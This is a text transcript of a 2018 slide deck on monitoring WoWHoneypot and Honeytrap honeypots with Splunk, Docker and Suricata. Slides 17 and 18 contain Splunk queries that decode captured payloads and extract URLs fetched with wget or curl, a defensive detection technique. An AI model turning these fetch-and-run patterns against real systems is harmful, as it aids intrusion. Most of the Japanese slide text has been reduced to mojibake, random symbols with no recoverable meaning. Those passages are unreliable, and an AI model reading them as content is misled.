Splunkによるハニーポット監視.pdf

C3dc96f43b11b8b40420fa3380836d94?s=47 sec-chick
September 30, 2018
860

 Splunkによるハニーポット監視.pdf

C3dc96f43b11b8b40420fa3380836d94?s=128

sec-chick

September 30, 2018
Tweet

Transcript

  1. 5   SPLUNK  SEC-CHICK

  2. WHO AM I •  sec-chick@one_sec_chick (('/+#!/) •  )/

    ,-$  PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap)  0".*/1
  3. 

  4.  Splunk (  ) WoWHoneypot Honeytrap PC  VPS

    SSH • Splunk
  5. SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$ ,;*!9,+$()0-"# • IT!905!29-6 7*!3 :

      > http://www.intellilink.co.jp/pd/products/package/security/splunk.html
  6.    • WoWHoneypot

  7.    • Honeytrap

  8.   8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705' 

    3. Splunk5' )7- 4. 37/  5. 2"570 .(70 82"570HEX$6(709
  9.   Attack_connection.local_port    10

  10.  Attack_connection.payload.data_hex  Hex  →    

  11.      

  12.   1.  Docker 2.    3.

    Splunk  4. Suricata 
  13. /.10,-%DOCKER • /.10,-&$ $!"' * ( #)  + $*

    (Docker+ • $ Docker+→% $
  14. %"-+( • .# Docker  %"-+(  • %"-+(cron$,* Splunk

    WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.#   Docker  
  15.  Splunk WoWHoneypot Honeytrap   VPS Honeypot  Docker

    
  16. SPLUNK+;N?  • 0 '!0.*Splunk+;N? 1  • @:NB+2EJ9N<IM' DECRYPT

    1 • G4MA,+/ - "$F4LNB1@:NB"$ 'D3NKB("& → Grep '!0 *)0 - C=/87J1D3NKB("& → 0 C='#-! 1  - HK562+>5MLNB1%$URL1D3NKB("& → HK562+>5MLNB1VirusTotal'
  17. WOWHONEYPOT |rex field=_raw "¥"(?<Method_wow>[^¥s]+)¥s(?<wow_path>[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? <base64_wow>.*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’)

    |eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?<wget_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?<curl_wowhoneypot>https?://[¥w/:¥.¥-]+?)¥s"
  18. HONEYTRAP | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted') | rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_honeytrap>https?://[¥w/:¥.¥-]+?)¥s"

    | rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_honeytrap>https?://[¥w/:¥.¥-]+?)¥s" |
  19. HONEYTRAP

  20. SURICATA4  • Grep05%72# 9),#1 #  • ;=:><05"68+* 525

    /#2# →  ./ • Suricata3)#&#6),7 !1$/'-(#??
  21.  "!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi

    # • @soji256 • @morihi_soc # -,1.)+  !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ !   2 http://goo.gl/8bLkZA
  22.   #  

  23. /)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$  +

    7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD